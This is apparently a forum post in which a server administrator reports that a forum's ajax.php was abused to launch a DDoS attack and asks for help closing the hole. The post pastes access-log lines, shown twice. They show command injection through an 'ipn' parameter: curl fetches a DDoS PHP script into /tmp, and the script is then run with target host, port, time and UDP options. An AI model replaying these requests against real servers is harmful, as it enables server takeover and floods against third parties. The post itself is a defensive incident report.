My server was used to perpetrate a DDoS attack yesterday and it appears the general attack vector was through ajax.php
For the moment, I've made ajax.php inaccessible, but I would appreciate any help closing this hole.
access.log:108.162.241.169 - - [27/May/2018:13:57:25 -0400] "GET /forums/ajax.php?ipn=curl%20https://raw.githubusercontent.com/drego85/DDoS-PHP-Script/dd72372ac9e3763318a8142719ef7da6cc0fa6a4/ddos.php%20%3E%20/tmp/temp.php HTTP/1.1" 200 39 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:57:42 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:58:15 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.155.167 - - [27/May/2018:13:58:22 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "TelegramBot (like TwitterBot)" "149.154.167.166"
access.log:162.158.154.142 - - [27/May/2018:13:58:25 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS%60 HTTP/1.1" 200 39 "-" "TelegramBot (like TwitterBot)" "149.154.167.171"
access.log:108.162.241.169 - - [27/May/2018:14:01:30 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60 HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:46 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60&method=udp HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:48 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10%20method=UDP HTTP/1.1" 200 85 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:03:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10&type=UDP HTTP/1.1" 200 287 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:05:03 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:06:32 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=20&type=UDP HTTP/1.1" 200 292 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.63.223 - - [27/May/2018:14:51:28 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=62.210.180.159%20port=80%20time=120&type=UDP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:53:34 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=120&type=UDP&method=STOP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:54:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=81.129.199.237%20port=80%20time=60&type=UDP HTTP/1.1" 200 293 "-" "-" "192.157.56.130"
For the moment, I've made ajax.php inaccessible, but I would appreciate any help closing this hole.
access.log:108.162.241.169 - - [27/May/2018:13:57:25 -0400] "GET /forums/ajax.php?ipn=curl%20https://raw.githubusercontent.com/drego85/DDoS-PHP-Script/dd72372ac9e3763318a8142719ef7da6cc0fa6a4/ddos.php%20%3E%20/tmp/temp.php HTTP/1.1" 200 39 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:57:42 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:58:15 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.155.167 - - [27/May/2018:13:58:22 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "TelegramBot (like TwitterBot)" "149.154.167.166"
access.log:162.158.154.142 - - [27/May/2018:13:58:25 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS%60 HTTP/1.1" 200 39 "-" "TelegramBot (like TwitterBot)" "149.154.167.171"
access.log:108.162.241.169 - - [27/May/2018:14:01:30 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60 HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:46 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60&method=udp HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:48 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10%20method=UDP HTTP/1.1" 200 85 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:03:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10&type=UDP HTTP/1.1" 200 287 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:05:03 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:06:32 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=20&type=UDP HTTP/1.1" 200 292 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.63.223 - - [27/May/2018:14:51:28 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=62.210.180.159%20port=80%20time=120&type=UDP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:53:34 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=120&type=UDP&method=STOP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:54:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=81.129.199.237%20port=80%20time=60&type=UDP HTTP/1.1" 200 293 "-" "-" "192.157.56.130"
Comment